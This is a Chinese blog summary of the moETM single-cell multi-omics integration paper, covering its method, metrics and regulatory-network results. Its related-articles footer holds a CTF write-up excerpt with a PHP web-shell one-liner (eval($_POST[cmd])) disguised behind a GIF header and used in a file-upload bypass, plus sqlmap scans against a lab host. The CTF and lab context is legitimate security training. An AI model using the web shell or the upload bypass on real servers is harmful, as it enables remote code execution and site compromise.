论文解析-moETM

论文解析-moETM

  • 参考
  • 亮点
  • 动机
  • 发展现状
    • 现存问题
  • 功能
  • 方法
    • Encoder改进
    • Decoder改进
  • 评价指标
    • 生物保守性
    • 批次效应移除
  • 实验设置
  • 结果
    • 多组学数据整合
    • cell-topic mixture可解释性
    • 组学翻译性能评估
    • RNA转录本、表面蛋白、染色质可及域调控关系研究
      • 1. 验证同一主题下,top gene可以映射到top protein
        • 过程
        • 结果
      • 2. 跨主题验证gene-protein、peak-gene的调控关系
        • 过程
        • 结果
      • 3. 验证重构的gene-protein、peak-gene更能反映组学相关性
    • 联合peak-gene分析细胞类型特异性通路和调控机制
      • 分析细胞类型特异性通路
      • 分析细胞类型特异性motif
      • 分析细胞类型特异性通路联合motif
  • 补充
    • 基因(蛋白)集富集过程
    • 基因与翻译蛋白表达负相关的可能原因
    • 寻找细胞标志物的资源--CellMarker数据库
    • 寻找TF对应靶基因的资源--ENCODE Transcription Factor Targets

参考

Zhou, M. et al. Single-cell multi-omics topic embedding reveals cell-type-specific and COVID-19 severity-related immune signatures. Cell Reports Methods 3, 100563 (2023).
在这里插入图片描述

亮点

动机

从单细胞多组学数据探究生物模式的现存困难:

  1. 相比单组学技术,多组学技术通量更低,数据包含的细胞数量较少
  2. 不同组学结合之后特征维度更高,例如把scRNA-seq和scATAC-seq结合到一起
  3. 多组学数据噪声更多(解决方式:概率模型)
  4. 批处理效应
  5. 多组学测序技术成本更高(解决方式:用模型预测缺失的组学数据)

发展现状

方法文献
SMILEXu, Y., Das, P., and McCord, R.P. (2022). Smile: mutual information learning for integration of single-cell omics data. Bioinformatics 38, 476–486.
totalVIGayoso, A., Steier, Z., Lopez, R., Regier, J., Nazor, K.L., Streets, A., and Yosef, N. (2021). Joint probabilistic modeling of single-cell multi-omic data with totalvi. Nat. Methods 18, 272–282.
multiVIAshuach, T., Gabitto, M.I., Jordan, M.I., and Yosef, N. (2021). Multivi: Deep Generative Model for the Integration of Multi-Modal Data. Preprint at bioRxiv. https://doi.org/10.1101/2021.08.20.457057.
CoboltGong, B., Zhou, Y., and Purdom, E. (2021). Cobolt: integrative analysis of multimodal single-cell sequencing data. Genome Biol. 22, 351–421.
scMMMinoura, K., Abe, K., Nam, H., Nishikawa, H., and Shimamura, T. (2021). Scmm: Mixture-Of-Experts Multimodal Deep Generative Model for Single-Cell Multiomics Data Analysis. Preprint at bioRxiv. https://doi.org/ 10.1101/2021.02.18.431907.
MultigrateLotfollahi, M., Litinetskaya, A., and Theis, F.J. (2022). Multigrate: SingleCell Multi-Omic Data Integration. Preprint at bioRxiv. https://doi.org/10. 1101/2022.03.16.484643.
MOFA+Argelaguet, R., Arnol, D., Bredikhin, D., Deloro, Y., Velten, B., Marioni, J.C., and Stegle, O. (2020). Mofa+: a statistical framework for comprehensive integration of multi-modal single-cell data. Genome Biol. 21, 111–117.

现存问题

  1. 需要在可扩展性、可解释性和灵活性进行权衡
  2. 完全数据驱动,不能充分利用生物学信息,例如基因注释和通路信息

功能

  1. 细胞聚类,识别细胞亚型
  2. 基于一个组学数据插补另一个组学数据
  3. 识别细胞类型特征和生物标志物

方法

在这里插入图片描述

整体是VAE架构,但是他在Encoder和Decoer分别作了改进:

Encoder改进

  1. 假设每个组学数据分布符合K维独立的逻辑正态分布,这里采用K维高斯乘积(PoG)充分利用这些分布的信息,比之前的MoE得到更有效的变分推理。
  2. 前人方法对每个组学分别进行采样K维高斯变量然后平均化,这里只需从联合高斯采样一次,因此可以得到更鲁棒的结果。
  3. Topic解释:对联合高斯密度进行Softmax计算,生成的逻辑正态分布可视为细胞的主题混合。

Decoder改进

  1. 矩阵分解作为Decoder,把cell-by-feature matrices分解成shared cell-by-topic matrix,shared topic-embedding matrix和M(组学数量)个独立的feature-embedding matrices
  2. 引入组学特异性的批次移除因子λ,作为线性可加的批次特异性偏差

评价指标

生物保守性

  1. Adjusted Rand Index (ARI)
  2. Normalized Mutual Information (NMI)

批次效应移除

  1. k-nearest neighbor batch effect test (kBET)
  2. Graph connectivity (GC):衡量不同批次相同细胞类型之间的相似性,同时衡量生物保守型和批次移除效应

实验设置

随机分为训练集:测试集=6:4,重复500次

结果

多组学数据整合

在这里插入图片描述

  1. 在4个peak-gene数据集上的平均指标第二,在3个gene-protein数据集上的平均指标第一,在所有7个数据集上平均指标第一
  2. moETM_* 为只利用组学*的数据进行训练和测试,与moETM结果对比表示,整合多组学数据比单组学数据得到更准确的结果
  3. moETM_avg 用分别从每个组学的高斯分布分别采样然后平均化代替PoG算法,结果降低了,说明PoG对于moETM起重要作用

cell-topic mixture可解释性

在这里插入图片描述
使用BMMC2数据集,把moETM训练得到的cell-by-topic matrix进行UMAP可视化,与其他方法得到的cell embdding可视化进行对比。
说明,cell-by-topic matrix既消除的BatchEffect,又识别了细胞类型。

组学翻译性能评估

在这里插入图片描述

  1. 由A、B图看出,基于转录组数据翻译的蛋白数据与原始蛋白数据高度相似,且高度线性相关(PCC约0.95)
  2. 由C、D图看出,基于ATAC数据翻译的基因数据与原始基因数据高度相似,且高度线性相关(PCC约0.69)
  3. 由A、C图对比看出,相比蛋白表达数据,基因表达数据明显更稀疏。因此,基于ATAC翻译RNA比基于RNA翻译蛋白更难
  4. 实验结果的PCC(ATAC2RNA=0.69,RNA2ATAC=0.58,RNA2protein=0.95,protein2RNA=0.65),由此推断翻译任务难度RNA2protein < ATAC2RNA < protein2RNA < RNA2ATAC

RNA转录本、表面蛋白、染色质可及域调控关系研究

1. 验证同一主题下,top gene可以映射到top protein

过程

对于每个topic,计算134对基因和对应的翻译蛋白的 topic score 的Spearman correlation

结果
  1. 平均相关性在0.29
  2. 13个topic 相关性高于0.5

2. 跨主题验证gene-protein、peak-gene的调控关系

过程

如果一个peak在一个基因转录起始位点150k bp之内,则认为他们是匹配的。
查看匹配的peak-gene、gene-protein的相关系数分布

结果

查看匹配的peak-gene、gene-protein的相关系数分布显著高于0,并且和观测值得到的分布类似。
说明:该算法在整合的时候保留的调控相关性,且能反映原始数据特征

3. 验证重构的gene-protein、peak-gene更能反映组学相关性

在这里插入图片描述
表明模型可以对观测数据的噪声进行降噪和混杂校正,更能反映单细胞中的不同组学的相关性

联合peak-gene分析细胞类型特异性通路和调控机制

分析细胞类型特异性通路

  1. 聚焦于一种类型的细胞(CD8+ T cells),将peak匹配到gene上,peak在一个基因转录起始位点150k bp之内,找到peak-neighboring genes。联合Topic score较高的的Top gene、Top peak联合分析
  2. 发现Top5 genes中3个与T细胞功能相关,Top5 peak对应的peak-neighboring genes中2个与T细胞功能相关,说明揭示了细胞类型特异性基因。
  3. 对Top5 genes、Top5 peak-neighboring genes进行通路富集(GSEA),得到的富集pathway与当前细胞类型相关,富集的基因集在当前细胞类型中显示出差异性表达(上调或下调),表明揭示了细胞类型特异性通路,及调控机制

分析细胞类型特异性motif

在这里插入图片描述

  1. 聚焦于一种类型的细胞(CD8+ T cells),从Ensembl database中,寻找根据Topic score排名的Top100 peaks对应的100个序列
  2. 将100个序列输入SEA算法,寻找这100个序列富集的motif
  3. 通过连接 Top genes,细胞类型、富集motif对应TFs 构造细胞类型特异性调控网络
  4. 通过ENCODE TF Targets dataset将已知的TF-genes用黄色线连接起来
  5. 结果表明:根据peak得到的motif在这种细胞类型中若干靶基因属于Top genes,说明模型识别了细胞类型特异性调控机制和motif特征

分析细胞类型特异性通路联合motif

在这里插入图片描述

  1. 聚焦于一种类型的细胞(CD8+ T cells),通过连接 Top genes、富集motif对应TFs、富集pathway构建pathway-motif网络
  2. motif与Top genes根据ENCODE TF Targets dataset记录的调控关系连线
  3. 对比该类型的富集motif与相关的pathway(基因特异性表达,上调或下调),表示motif和pathway之间的调控关系一致性

补充

基因(蛋白)集富集过程

在这里插入图片描述

  1. 对于每个Topic,根据主题分数得到的rank gene list,通过运行GSEAPreranked函数从Molecular signatures database (MSigDB)查询2种基因集(免疫学特征基因集,基因本体生物过程)
  2. 对于过表达或低表达的基因计算富集分数(ES)
  3. 计算ES的统计学显著性
  4. 认为显著性 p-value<0.05 的基因集是显著的
  5. 图中每个颜色代表一个基因集(pathway),虚线以上的代表具有显著性。目的是说明每个Topic均可以显著性富集到基因集或pathway

基因与翻译蛋白表达负相关的可能原因

  1. 随机噪声可能会阻碍基因和蛋白质之间的相关性
  2. 单细胞水平的动态细胞过程(转录爆发、转录或翻译延迟)可引起细胞之间的差异,导致相关性降低
  3. 其他生物过程的影响压倒了转录的影响(转录后翻译的影响超过了蛋白质合成)
  4. mRNA降解速度超过蛋白质合成速度

寻找细胞标志物的资源–CellMarker数据库

Zhang, X., Lan, Y., Xu, J., Quan, F., Zhao, E., Deng, C., Luo, T., Xu, L., Liao, G., Yan, M., et al. (2019). Cellmarker: a manually curated resource of cell markers in human and mouse. Nucleic Acids Res. 47, D721–D728.

寻找TF对应靶基因的资源–ENCODE Transcription Factor Targets

The ENCODE Project Consortium (2011). A user’s guide to the encyclopedia of dna elements (encode). PLoS Biol. 9, e1001046.
ENCODE Project Consortium; and Pachter, L. (2004). The encode (encyclopedia of dna elements) project. Science 306, 636–640.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/161190.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

什么是NetApp的DQP和如何安装DQP?

首先看看什么是DQP&#xff0c;DQPDisk Qualification Package&#xff0c;文字翻译就是磁盘验证包。按照NetApp的最佳实践&#xff0c;要定期升级DQP包&#xff0c;保证对最新磁盘和磁盘扩展柜的兼容。 本文主要介绍7-mode下如何升级DQP&#xff0c;至于cluster mode另外文章…

NewStarCTF2023week2-Upload again!

尝试传修改后缀的普通一句话木马&#xff0c;被检测 尝试传配置文件 .htaccess 和 .user.ini 两个都传成功了 接下来继续传入经过修改的木马 GIF89a <script language"php"> eval($_POST[cmd]); </script> 没有被检测&#xff0c;成功绕过 直接上蚁剑…

圣树唤歌最强阵容2023,圣树唤歌阵容推荐

无疑圣树唤歌作为一款备受欢迎的手机游戏&#xff0c;其深刻的战斗系统一直以来都受到大家的追捧。在这个虚拟世界中胜利的关键在于组建一支无懈可击的强大队伍&#xff0c;要想成为强者&#xff0c;就必须拥有最强阵容。 关注【娱乐天梯】&#xff0c;获取内部福利号 在本篇攻…

C++项目实战——基于多设计模式下的同步异步日志系统(总集篇)

文章目录 专栏导读项目介绍开发环境核心技术环境搭建日志系统介绍1.为什么需要日志系统2.日志系统技术实现2.1同步写日志2.2异步写日志 前置知识补充不定参函数C风格不定参函数不定参宏函数设计模式六大原则单例模式饿汉模式懒汉模式 工厂模式简单工厂模式工厂方法模式抽象工厂…

Linux:mongodb数据逻辑备份与恢复(3.4.5版本)

我在数据库aaa的里创建了一个名为tarro的集合&#xff0c;其中有三条数据 备份语法 mongodump –h server_ip –d database_name –o dbdirectory 恢复语法 mongorestore -d database_name --dirdbdirectory 备份 现在我要将aaa.tarro进行备份 mongodump --host 192.168.254…

攻防演练蓝队|Windows应急响应入侵排查

文章目录 日志分析web日志windows系统日志 文件排查进程排查新增、隐藏账号排查启动项/服务/计划任务排查工具 日志分析 web日志 dirpro扫描目录&#xff0c;sqlmap扫描dvwa Python dirpro -u http://192.168.52.129 -b sqlmap -u "http://192.168.52.129/dvwa/vulnera…

Jmeter接口测试:jmeter导入和导出接口的处理

JMeter测试导入接口 利用Jmeter测试上传文件&#xff0c;首先可根据接口文档或者fiddler抓包分析文件上传的接口&#xff1b;如下图&#xff1a; 以下是我通过fiddler所截取的文件上传的接口 1、填写导入接口的信息 查看文件上传栏下的填写信息&#xff1a; 文件名称&#x…

Unity中Shader的深度写入ZWrite

文章目录 前言一、更新深度缓冲区中值二、深度值的写入操作只有两个选择 开启 和 关闭ZWrite OnZWrite Off 三、深度写入在半透明物体物体中开启的情况1、特效一般都需要关闭深度写入2、如果在人物模型上使用 特效半透明 的 Shader&#xff0c;为了不出现模型自身穿透问题&…

Web3D虚拟人制作简明指南

如何在线创建虚拟人? 虚拟人,也称为数字化身、虚拟助理或虚拟代理,是一种可以通过各种在线平台与用户进行逼真交互的人工智能人。 在线创建虚拟人变得越来越流行,因为它为个人和企业带来了许多好处。 通过虚拟助理或代理,您可以以更具吸引力和个性化的方式与客户或受众进…

146.LRU缓存

双向链表哈希表 class LRUCache { public://1、定义双向链表结构、容量、哈希表等LRU数据成员struct Node{int key,value;Node *left,*right;Node(int _key,int _value):key(_key),value(_value),left(NULL),right(NULL){}}*L,*R;int n;unordered_map<int,Node*> ump;//…

李航:关于大模型的思考及研究热点

本文阐述李航老师对 LLM 的一些看法&#xff0c;主要观点如下&#xff1a; ChatGPT 的突破主要在于规模带来的质变和模型调教方式的发明。 LLM 融合了实现人工智能的三条路径。 LLM 的开发需要结合第三者体验和第一者体验。 LLM 能近似生成心智语言。 LLM 需要与多模态大模…

SamSung三星笔记本NP930QCG-K02CN原装出厂OEM预装Win10系统

下载链接&#xff1a;https://pan.baidu.com/s/13GsR_r9caJkLjiWWaXa30Q?pwdncp9 系统自带指纹驱动、声卡,网卡,显卡等所有驱动、三星出厂时主题壁纸、系统属性三星专属LOGO标志、Office办公软件等三星出厂时自带的预装程序 由于时间关系,绝大部分资料没有上传&#xff0c;不…

Unity之ShaderGraph如何实现上下溶解

前言 我们经常在电影中见到的一个物体或者人物&#xff0c;从头上到脚下&#xff0c;慢慢消失的效果&#xff0c;我么今天就来体验一下这个上下溶解。 主要节点 Position节点&#xff1a;提供对网格顶点或片段的Position 的访问 Step节点&#xff1a;如果输入In的值大于或…

双目视觉实战--相机几何

目录 一、针孔摄像机和透镜 1. 针孔摄像机的原理 2. 近轴折射模型 3. 镜头畸变问题 二、摄像机几何 1. 数学基础 2. 相机坐标系&#xff08;空间点&#xff09;→像素坐标系的映射关系&#xff1a; 3. 规范化投影变换 4. 投影变换的性质 三、其他摄像机模型 1. 弱透视…

新时代高效记账:自动化智能如何进行财务管理

随着科技的不断发展&#xff0c;自动化智能已经逐渐渗透到我们生活的各个领域。在财务管理中&#xff0c;自动化智能的应用显得尤为重要。它不仅可以提高财务管理的效率和精度&#xff0c;还能帮助我们更好地规划和掌控公司的财务状况 晨曦记账本提供了多种高效财务管理工具。…

【MultiOTP】Docker安裝MultiOTP, 让Windows登入更安全(MFA)

序 在当前数字时代&#xff0c;网络安全成为了一个非常重要的话题。随着越来越多的人和组织依赖于计算机系统来进行工作和存储敏感信息&#xff0c;确保身份验证安全变得至关重要。双因素身份验证&#xff08;2FA&#xff09;是一种强大的安全措施&#xff0c;可在传统的用户名…

设计模式截图记录

设计模式截图记录

机器人制作开源方案 | 双轮提升搬运小车

1. 功能描述 双轮提升搬运小车是一种用于搬运和移动物体的机械设备&#xff0c;它通常采用双轮驱动和提升装置。一般具备以下特点&#xff1a; ① 双轮驱动&#xff1a;该小车配备两个驱动轮&#xff0c;通过电动机或其它动力源驱动&#xff0c;提供足够的动力和扭矩&#xff0…

Stable Diffusion绘图,lora选择

best quality, ultra high res, (photorealistic:1.4), 1girl, off-shoulder white shirt, black tight skirt, black choker, (faded ash gray hair:1), looking at viewer, closeup <lora:koreandolllikeness_v20:0.66> 最佳品质&#xff0c;超高分辨率&#xff0c;&am…

【Java 进阶篇】JavaScript DOM Document对象详解

在前端开发中&#xff0c;DOM&#xff08;文档对象模型&#xff09;扮演着重要的角色。它允许我们使用JavaScript来与网页文档进行交互&#xff0c;实现动态的网页效果。DOM的核心部分之一就是Document对象&#xff0c;它代表了整个HTML文档。在本篇博客中&#xff0c;我们将深…